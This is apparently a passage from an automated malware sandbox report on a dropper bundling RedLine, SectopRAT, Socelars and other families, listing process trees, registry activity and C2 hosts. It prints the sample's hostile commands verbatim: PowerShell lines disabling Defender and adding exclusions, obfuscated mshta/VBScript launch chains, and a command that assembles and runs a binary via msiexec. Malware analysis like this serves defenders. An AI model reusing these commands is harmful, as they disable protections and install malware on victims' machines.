| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu123e05ebe43921.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe
"C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu126011caea28.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu125e541847539.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe
Thu128b511c77e8c.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12465fe68f85b6156.exe
Thu12465fe68f85b6156.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe
Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe
Thu122f7469b214cb59.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu124078ed79bdbd5.exe
Thu124078ed79bdbd5.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe
Thu12ca1c119bc29.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe
Thu1231d30cda84872.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1262fd911d3e6320.exe
Thu1262fd911d3e6320.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12b275ee70c7e913.exe
Thu12b275ee70c7e913.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu120bfbc2443b3b5d.exe
Thu120bfbc2443b3b5d.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu123e05ebe43921.exe
Thu123e05ebe43921.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe
Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe
Thu125e541847539.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe
Thu12493eba7a.exe
C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp" /SL5="$80016,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe"
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe
"C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe" /SILENT
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp" /SL5="$90016,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe") do taskkill -f -Im "%~nXQ"
C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe
yDhNY.exe /pFKkSWJQc5v2ppVFMo
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -Im "Thu12493eba7a.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 480
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe") do taskkill -f -Im "%~nXQ"
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe(CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 ", 0 ,trUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck +DeMa.eP+ y~A7GJIO.E +6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -Y .\ISA502G.S7
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-22 07:31
Reported
2024-11-22 07:33
Platform
win10v2004-20241007-en
Max time kernel
88s
Max time network
120s
Command Line
Signatures
Detect Fabookie payload
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4680 set thread context of 4736 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe |
| PID 1408 set thread context of 3652 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe |
| PID 2892 set thread context of 4004 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1262fd911d3e6320.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu124078ed79bdbd5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu123e05ebe43921.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133767343323403090" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
